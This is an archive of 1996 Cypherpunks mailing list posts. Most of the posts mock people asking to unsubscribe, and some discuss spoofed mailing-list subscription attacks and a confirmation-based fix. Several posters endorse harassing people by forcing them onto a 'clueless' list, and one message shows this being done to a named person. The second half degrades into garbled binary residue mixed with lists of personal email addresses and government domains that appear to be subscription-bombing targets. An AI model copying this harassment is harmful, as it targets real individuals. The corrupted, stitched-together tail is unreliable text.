	delete wombat@cyberpunk.ucsd.edu connectionists

	help eggbeaters

Note that although you would mail submissions to a campus mailing list by
addressing mail to e.g., sunusers@ucsd.edu. In a subscription request
you specify the name of the list simply (without the @ucsd part) as in 
the first example above.

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 18 Apr 1996 13:37:27 +0800
To: cypherpunks@toad.com
Subject: Re[2]: on corporations and subpoenas
Message-ID: <v02120d01ad9b43b87f69@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 AM 4/17/96, Adam Pingitore wrote:

>           Um, well, then I'm going to have to spam your ass.

Your metaphor escapes me...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 15:16:46 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Death Penalty for "take me of" messages?
Message-ID: <ad9b0ca80f0210043f65@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:08 AM 4/18/96, Leslie Farnsworth wrote:
>take me of your emailing list

She (or he) can't even spell "off."

This clown also sent me the same message privately, so anything done to her
or him is only fair..

The Cypherpunks Death Penalty?


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 18 Apr 1996 16:19:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
In-Reply-To: <ad9b0ca80f0210043f65@[205.199.118.202]>
Message-ID: <199604180512.WAA09220@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	could we please dispense with the posts cc'ing the list about
these idiots? I already never read posts by idiots because they aren't
in my list of people I read, but I have to read these replies.

	The proper steps to take when someone makes such a posting:

A) Flame them privately
B) Subscribe them to clueless@c2.org

> At 1:08 AM 4/18/96, Leslie Farnsworth wrote:
> >take me of your emailing list
> 
> She (or he) can't even spell "off."
> 
> This clown also sent me the same message privately, so anything done to her
> or him is only fair..
> 
> The Cypherpunks Death Penalty?
> 
> 
> --Tim May
> 
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 18 Apr 1996 14:34:35 +0800
To: cypherpunks@toad.com
Subject: Re: on corporations and subpoenas
Message-ID: <v02130524ad9b57387f8e@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


re:
>          GET ME OFF THE DAMN LIST

Read the damn directions you got when you signed on.  You know, that first
message that told you to save the damn message in case you ever wanted to
sign off the list in the future.

Your cluelessness does not create any obligation in me to fix your problem.
Perhaps if you were a little less rude someone might be inspired to give
you useful information.


Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick May <pjm@spe.com>
Date: Thu, 18 Apr 1996 20:21:35 +0800
To: cypherpunks@toad.com
Subject: [Explanation] Re: "STOP SENDING ME THIS SHIT"
Message-ID: <199604180537.WAA01617@gulch.spe.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
 > "Adam Pingitore" writes:
 > >           I've got news for you all. This 'jerk' was spammed by some
 > >           ass out there. I've canceled by subscription so would you
 > >           all quit whining already. Sorry if I sent you people
 > >           inappropriate mail, but I just wasn't very happy getting
 > >           2000 e-mails a day.
[ Mr. Metzger's amusing flame elided. ]

     I run a small mailing list that has been subject to problems
similar to the recent spate of "unscrives".  Apparently there is a
list of mailing lists circulating the warez boards along with scripts
for spoofing subscription requests.  Over the past few months my list
has periodically received batches of bogus subscriptions for accounts
ranging from Fidonet sysops to Al Gore to random AOL users.  Email
from other mailing list admins indicates that these same accounts,
perhaps two hundred in all, were subscribed to several hundred lists.

     Crypto relevance:  This attack will be eliminated when more mail
agents support public key crypto and the mailing list software can be
modified to check signatures on subscription requests.

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMXXU22AA81GB0e9dAQEjowf9EpmBXt3smBCduo3QF6/FLRRsC7NX65Ew
7jDI48XO9BWCOTXwwsFgibGgvefjtRKosB77SgeOy0q8QbukWjO8SXzqmQBSH3hK
MBbP6Z1HVlP29KkyVpuWf9RAdsFMYGRuUjrFBNsc+ohpztW75MXvBkqHX7jGEk9K
fpmTfQv8TRyygjNR8bqiAXGWMP3OWq/gIO27ydCDG8+7czzqcCX6/JiGsYdH8ns5
sBAPe5oJsm15at4i8khNtpNbf/+JTm6cS+TTAhQLaBTxmdxUDAa/zQlxeevSsrfl
sBo9fRF+IgU4v9Zw7BSDcc4E3FKCjpZ39PXLfW+QPH7WBPu9hRjQVw==
=4GcH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 18 Apr 1996 17:48:27 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re[2]: on corporations and subpoenas
Message-ID: <v02130525ad9b5ba388d0@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


Adam,
re:

At 9:42 AM 4/17/96, Adam Pingitore wrote:
>          Um, well, then I'm going to have to spam your ass.

Um, well, then I'm going to have to notify your postmaster of your threat
to spam the cypherpunks@toad.com mailing list.  I'm certain he has better
things to do than reply to several hundred irate cypherpunks copying your
spam to him and will take appropriate steps.

Grow up.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Thu, 18 Apr 1996 17:31:50 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604180605.XAA23981@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


        "add leslie@koalas.com clueless"
'leslie@koalas.com' was ADDED to the 'clueless' mailing list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 18 Apr 1996 22:28:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
In-Reply-To: <ad9b0ca80f0210043f65@[205.199.118.202]>
Message-ID: <199604180607.XAA02282@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
> 
> At 1:08 AM 4/18/96, Leslie Farnsworth wrote:
> >take me of your emailing list
> 
> She (or he) can't even spell "off."
> 
> This clown also sent me the same message privately, so anything done to her
> or him is only fair..
> 
> The Cypherpunks Death Penalty?



There's lately been a spate of l00sers subscribing
unsuspecting people to various hugh-traffic mailing lists.

I'd be willing to bet that a number of the 'unsubscrive' people
we have been seeing lately have been subscrived by their "friends"
and have never seen the "welcome to cypherpunks" list message, or
probably any mailing lists welcome message for that matter.

One list admin I know of has to manually unsubscribe
president@whitehouse.gov from a motorcycle racing list
three or more times a week.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Apr 1996 14:57:48 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604172256.SAA09641@universe.digex.net>
Message-ID: <199604180335.XAA05998@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> "Perry E. Metzger" writes:
> >> In the context of "fair coin flips" the text of Hamlet is NOT compressible




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Apr 1996 15:03:21 +0800
To: Leslie Farnsworth <leslie@koalas.com>
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <Pine.LNX.3.91.960417180811.3310E-100000@koalas.com>
Message-ID: <199604180356.XAA06056@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Leslie Farnsworth writes:
> take me of your emailing list

I will do nothing to take you off this mailing list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 18 Apr 1996 19:05:27 +0800
To: Patrick May <cypherpunks@toad.com
Subject: Re: [Explanation] Re: "STOP SENDING ME THIS SHIT"
Message-ID: <2.2.32.19960418070811.00a81010@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:37 PM 4/17/96 -0700, Patrick May wrote:

>     I run a small mailing list that has been subject to problems
>similar to the recent spate of "unscrives".  Apparently there is a
>list of mailing lists circulating the warez boards along with scripts
>for spoofing subscription requests.  Over the past few months my list
>has periodically received batches of bogus subscriptions for accounts
>ranging from Fidonet sysops to Al Gore to random AOL users.  Email
>from other mailing list admins indicates that these same accounts,
>perhaps two hundred in all, were subscribed to several hundred lists.

Teleport has been having the same problems.  They have a modification to
majordomo that sends a confirm message to the intended
victim^H^H^H^H^H^Hrecipient asking if he/she/it really wanted to subscribe
and request that they send back a passphrase to confirm the subscription.

This has two benificial effects...  It keeps the unwilling from being
subscribed to lists that they do not want.  It also keeps the incredibly
clueless from subscribing in the first place since they can never figure how
to get the confirm message back to majordomo without botching it.

I will find from the "powers that be" at teleport if the patch is publically
released for use.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Express <express@xor.com>
Date: Thu, 18 Apr 1996 20:24:25 +0800
To: cypherpunks@toad.com
Subject: Welcome to Express!
Message-ID: <199604180841.CAA04544@billygoat.xor.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Guest: 

Merci! and thank you for registering. At Express Online, your user
name is "cypherpu" and your password is "cypherpunks". 

To enter the world of Express, use this user name/password combination.
Please save this record for future reference, so you can always
download the latest news from Express on fashion, shopping, travel,
music and more.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 18 Apr 1996 18:16:50 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <960418025428_377757492@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Is it possible to find a percentage of the key space to eliminate that
>will optimize security assuming that the attacker will try the easy
>stuff first (and is it possible to quantify "easy stuff")?

If you eliminate all repeating byte sequences, such as 00 00 or 7F 7F, you
will reduce your possible entropy by .07058% (7.99435 bits per byte), and
eliminate the (astronomically remote) possibility of Hamlet or some other
English text popping out of your RNG/PRNG.  As long as your key is long
enough to withstand this slight entropy reduction, you are still OK.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 18 Apr 1996 21:34:08 +0800
To: cypherpunks@toad.com
Subject: [Noise] Unsubrscive $$$
Message-ID: <960418025429_377757515@emout18.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wanna make lotsa money?  Just charge $20 for instructions whenever the
clueless want off the list.  When they email you with their pathetic
"unsubscrive" pleas, get their MasterCard / Visa / AmEx / Discover number and
expiration date.  Call it a "spamming fee" to compensate you for the time it
takes to download and respond to their iggorant [sick] requests.  See you on
the Riviera!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 19 Apr 1996 03:23:22 +0800
To: cypherpunks@toad.com
Subject: [CDA] "Million Geek March" on Washington
Message-ID: <v0300660bad9bcad52cc9@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[fwd from: Keith A. Glass <salgak@dcez.com>]

>Friends of Free Speech on the Net:
>
>On June 30th, 1996, a large anti-CDA rally, the Electronic Freedom March,
>is planned for the Ellipse, in front of the White House.  But without your
>help, it won't happen.
>
>We need volunteers to help us plan the EFM and the logistics required for
>it, people to help us raise funds to pay the expenses (the Park Service
>has required us to provide 80 porta-potties, at a cost of nearly $4500.00
>alone, and that's not our only requirement. . .), and people to help us
>run the March on June 30th.  Not to mention publicity, etc.
>
>We need your help.  **I** need your help.  I've posted this to the DC area
>groups, as well as to a few groups that I feel might be useful in
>gathering more volunteers and interested people.  But I need your
>committment to help NOW, or we won't be able to run the EFM, or as it's
>been called, the "Million Geek March".  Come on, out there: help us out!!!
>
>--
>*   Keith A. Glass,  Annandale, Virginia, USA, Filker/punster at large    *
>*           Washington Coordinator, Electronic Freedom March              *
>*        30 June 1996, Washington DC   URL: http://www.efm.org            *
>*  Note: the following line is an intentional act of Civil Disobedience:  *
>*  FUCK THE TELECOMMUNICATIONS DECENCY ACT--DEFEND THE FIRST AMENDMENT !  *






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Thu, 18 Apr 1996 14:45:13 +0800
To: cypherpunks@toad.com
Subject: Re: cluelessness
Message-ID: <199604180304.FAA10866@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996 sameer@c2.org wrote:

> > 
> > I think the "clueless" mailing list is a must at this point.
> 
> 	clueless@c2.org/majordomo@c2.org
> 
> 	subscribe idiots as necessary.

is this the original clueless list or a new one just created?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Thu, 18 Apr 1996 17:31:39 +0800
To: cypherpunks@toad.com
Subject: Re: cluelessness
Message-ID: <199604180321.FAA11032@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996 sameer@c2.org wrote:

> > 
> > I think the "clueless" mailing list is a must at this point.
> 
> 	clueless@c2.org/majordomo@c2.org
> 
> 	subscribe idiots as necessary.

is this the original clueless list or a new one just created?


stevwint198.JBFaa238aloalui@cs.usfablcwadamaimarlemncognniala@x.pyroceania-passport-lpapresssmstetink.comwwhijndwerner@
amonacomsumlfotzollne@
pcia.orq@c2.org
mmyaheð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙ1ïxFrom: nobody@shinobi.alias.net (Anonymous)
Comments: Please report misuse of this automated remailing service to <remailer-admin@shinobi.alias.net>

Request-Remailing-To: jmurphy@gcnnet.com



-----BEGIN PGP MESSAGE-----
Version: 2.6.2

pgAAAUN/sA6maQUP4iU2FshtU88rLdmNe7obn+IqRA5b8ND7ukA0mL5Fo4h6MFjm
+QY2lrmB7oE/TqecOM0+hUHBFmbJaWCQHZJK+3haDNwbja4MM6QTPgpwRRB/qEr0
QmQkPOiHByJyFnirQxE6gBOezhyxi+2EqkY4lBYKpzGVgbigBCHU/DgtXVB8Vt5T
mn/EK6qkoF2spCsG1+ljpnwGtwYKWKLA7/DzSpjQqvhs87JJJrimduo6nOO2tqrS
Fsm/5nWoXx17w4cSfUtVsdd2W9rZxtCXC2iCJodfyC8VH5WAvo358jz3setonvH5
CVQR9aCTzSw5NEZzwGeeOOg5TSyOSBrKoJe1p/PNrFKx1MdCx0LCbX3Et0xsQ+lw
s/qDmOulZsfRJnHZjGf7HWCv6w81MweiJImldRrIlT/SpYc9VMGiow==
=axvc
-----END PGP MESSAGE-----

KEJ
HPOBAJKLCGHNJBOP
IBBABHKFEMMFBHCA
IJGKAIMHHCJCCEMI
IKDFBJDPKAANINLL
JBOFECLPLKJGLEOK
JDLCJPLHCBCBCPEJ
JIKAJOLFFLNOEKFP
JLJHLEEOEHBGAJBD
JPFIDAMBCLFHDFIJ
MAKAOFICEKCLDLOI
v£ ïwõïv£v¤,ïv¤<ïx<(ïx<Lïwõ`ïwõdïwõhïwõàïwõÀïx<Pïv¤Äïv¤xïv¤\ïv¤Ôïv¤lïx"ïv¤¤ïv¤¬ïx<Ðïv¤"ïv¤´ïv¤"ïwõ¸ïx=Ôïx>Tïx>Xïx=Tïx=Pïv¥¨ïv²ÜïxÈïv³¸ïv³ïv²°ïx¨ïv³$ïv´,ïv³ÜïwøÀïwø¬ïwøíïx
,ïx
8ïx
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøØïwùïwùïwù$ïwù0ïwùCïwùOïwùyïv´\ïx
Lïx
Pïx
Tïwùdïv´`ïx>hïx>qïv´xïv´lïxx€ïvc‚ïwéðïxBÜïva-ïv'4ïwÛüïwñ€ïuþ,ïwú8ïwÝ`ïxBàïxBäïxBèïv†ïvÈïvƒLïvx ïwî€ïvƒDïxwõtïwî"ïwÚ,ïv
Ä0¿ÿ-ÿWœ0¿þX;Ü(c)ÀblýÚ0¿ý}0¿ýz 0¿ýw,0¿ýt80¿ýqD0¿ýnP0¿ýk\0¿ýhh0¿ýet0¿ýb€0¿ý_Œ0¿ý\˜0¿ýY¤0¿ýV°0¿ýS1/4;ÝtÀbˆÈ;ÝsÀcÈÔ0¿ýJà0¿ýGì;Ü¶Àbˆø0¿ýA¿ýÃì0¿ûÄ¿û...FÀÚ¸



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~var/adm/utmpxv¬ïv"ïvÂïvÌïvÑïvåïvûïv€ïv€ïv€%ïv€,ïv€6ïv€Iïv€Yïv€eïv€qïv€|ïv€Šïv€˜ïv€­ïv€Àïv€Óïv€ëïv€úïv
ïvïv$ïv8ïvMïvcïv{ïvŽïv§ïv·ïv¬ïv"ïvÂïvÌïvÑïvåïvûïv€ïv€ïv€%ïv€,ïv€6ïv€Iïv€Yïv€eïv€qïv€|ïv€Šïv€˜ïv€­ïv€Àïv€Óïv€ëïv€úïv
ïvïv$ïv8ïvMïvcïv{ïvŽïv§ïv·ïvŸ4ïvŸHïvŸXïvŸpïvŸˆïvŸ ïvŸ¸ïvŸÔïvŸðïv 
ïwðÐïxôïv hS0ïv¥°ïv¥Àïv¥Ôïv¥øïv¦
ïv¦ ïv¦,ïv¦Dïv¦Pïv¦\ïv¦pïv¦€ïv¦ïv¦ ïv¦´ïv¦Èïv¦Üïv¦üïv§
ïv§ïv§4ïv§Dïv§\ïv§lïv§xïv§ïv§¤ïv§Àïv§Ôïv§ðïv¨
ïv¨ïv¨,ïv¨Hïv¨hïv¨"ïv¨"ïv¨¸ïv¨Ôïv¨àïv¨ìïv¨øïv(c)ïv(c)(ïv(c)<ïv(c)Tïv(c)hïv(c)xïv(c)ïv(c)¨ïv(c)´ïv(c)Àïv(c)Ôïv(c)èïv(c)øïvªïvª0ïvªHïvª\ïvªtïvª"ïvª"ïvª°ïvªÀïvªÌïvªØïvªìïvªøïv"ïv"ïv",ïv"Tïv"pïv"ïv"¨ïv"Ðïv"øïv¬ïv¬Xïv¬€ïv¬Œïv¬¨ïv¬üïv­ïv­ïv­!
 (ïv­8ïv­Xïv­xïv­ïv­¬ïv­Ðïv­Üïv­èïv­ôïv(r)ïv°Äïv°Ðïv°àïv°ðïv±3456789abcdef/%d/%yccess from libc routinesn error: value 0x%x overflows %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙ8is one of/ü¿ïwµxïwÝaÿÿÿïÿðï¥88888ïÿýà~Àï~1/48JPFIDAMBCLFHDFIJÒs %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙis one of/ü³ÈïwµxïwÝaÿÿÿüa{@ð'Ðïwµxïÿðïû€ï}JàÒ.du.edu
seacell-l-outgoing@oceania.org
seacell-l@oceania.org
soc.culture.sri-lanka
ssmegma@aol.com
steiner@netcom.com
tink.com
ursula@cyberspace.org 
wainc@
warep@wabash.edu
warep@wally2.wabash.edu
web-l-outgoing@oceania.org
web-l@oceania.org
whitehouse
whitehouse.gov
jgroby@
nbelck@
dwerner@
kneher@
cstrack@
amonaco@
hbengts@
rbollin@
msumner@
lfoster@
tzollne@
pentagon.dgsys.com
cia.org
internic.net
q@c2.org
remailer@yap.pactitle.com
remailer@ee.siue.edu
mix@black-ice.gateway.com
rebel@espresso.myaFrom: nobody@shinobi.alias.net (Anonymous)
Comments: Please report misuse of this automated remailing service to <remailer-admin@shinobi.alias.net>

::
Anon-To: cypherpunks@toad.com
Subject: Re: cluelessness

On Wed, 17 Apr 1996 sameer@c2.org wrote:

> > 
> > I think the "clueless" mailing list is a must at this point.
> 
> 	clueless@c2.org/majordomo@c2.org
> 
> 	subscribe idiots as necessary.

is this the original clueless list or a new one just created?


3mail.3com.com
may@cyberstation.net
mriddell@netcom.com
ncognito@gate.net
niala@x.pyramid.com
oceania-l-outgoing@oceania.org
oceania-l@oceania.org
passport-l-outgoing@oceania.org
passport-l@oceania.org
president@
raylc@teleport.com
rperkins@nyx.cs.du.edu
seacell-l-outgoing@oceania.org
seacell-l@oceania.org
soc.culture.sri-lanka
ssmegma@aol.com
steiner@netcom.com
tink.com
ursula@cyberspace.org 
wainc@
warep@wabash.edu
warep@wally2.wabash.edu
web-l-outgoing@oceania.org
web-l@oceania.org
whitehouse
whitehouse.gov
jgroby@
nbelck@
dwerner@
kneher@
cstrack@
amonaco@
hbengts@
rbollin@
msumner@
lfoster@
tzollne@
pentagon.dgsys.com
cia.org
internic.net
q@c2.org
remailer@yap.pactitle.com
remailer@ee.siue.edu
mix@black-ice.gateway.com
rebel@espresso.cafe.uqam.ca
myan@gpu.srv.ualberta.ca
henningk@powertech.no
murso@fnalv.fnal.gov
j-urso@district86.k12.il.us
brennan@demon.co.uk
zapyo@aol.com
,ïx
8ïx
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøØïwùïwùïwù$ïwù0ïwùCïwùOïwùyïv´\ïx
Lïx
Pïx
Tïwùdïv´`ïx>hïx>qïv´xïv´lïxx€ïvc‚ïwéðïxBÜïva-ïv'4ïwÛüïwñ€ïuþ,ïwú8ïwÝ`ïxBàïxBäïxBèïv†ïvÈïvƒLïvx ïwî€ïvƒDïxwõtïwî"ïwÚ,ïv
Ä0¿ÿ-ÿWœ0¿þX;Ü(c)ÀblýÚ0¿ý}0¿ýz 0¿ýw,0¿ýt80¿ýqD0¿ýnP0¿ýk\0¿ýhh0¿ýet0¿ýb€0¿ý_Œ0¿ý\˜0¿ýY¤0¿ýV°0¿ýS1/4;ÝtÀbˆÈ;ÝsÀcÈÔ0¿ýJà0¿ýGì;Ü¶Àbˆø0¿ýA¿ýÃì0¿ûÄ¿û...FÀÚ¸



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~vae fileion now in progressOST_OSLIBwïvz0ïvz8ïvz@ïvzHïvzPïxïx
ïxïwÜXïwÜ\ïwÜ`ïwÜdïwÜ€ïwÜ|ïwÜxïwÜtïwÜpïwÜlïwÜhïwÜ"ïwÜˆïvzXïv•¤ïwÜ¨ïwÜïwÜ¬ïr¿´ïv•°ïv•¸ïwæ(ïx0ïwåÈïv1/4ïv•Àïwè8ïv•Äïv•Ôïx´ïxÈïv•üïv-ïv-
ïv-ïwè@ïwè<ïx	ïv{(ïvzàïv{@ïvzüïx
}ïx
aïx
1ïx	ñïv}ˆïv{ˆïx	±ïwè`ïx	/ïv{ïvz ïvz`ïx
aïwèHïv{Xïx	Ñïx
(tm)ïv-ïv-4ïv-Lïwèhïwè ïwèŒïwè˜ïwè€ïv}¨ïv}°ïx
´ïv- ïv-œïv-|ïv-¤ïv-ïv-tïv-¬ïwè¨ïwéïv-(ïv-ôïxØïv-äïxèïxàïv-ïv-,ïv-<ïv-üïv-ïxÜïv-dïv- ïv-ìïv-tïv-0ïv-@ïv-ïxäïwéïwèÄïwèÈïwéïwèÌïwèÀïv}¸ïv}Àïv}Èïwé ïwé8ïxøïv-ˆïxðïv-xïv-"ïv-€ïxìïv-˜ïv-"ïv-|ïwéPïx
1/4ïx
ðïx
Äïx
èïx
äïx
ôïwé\ïwé|ïxïv-¤ïxüïxïv-œïxïx
Àïwé`ïx
ìïwéXïx
àïx
Ðïx
Èïx
Ôïwéxïx
Ìïx
Üïx
Øïwéˆïx
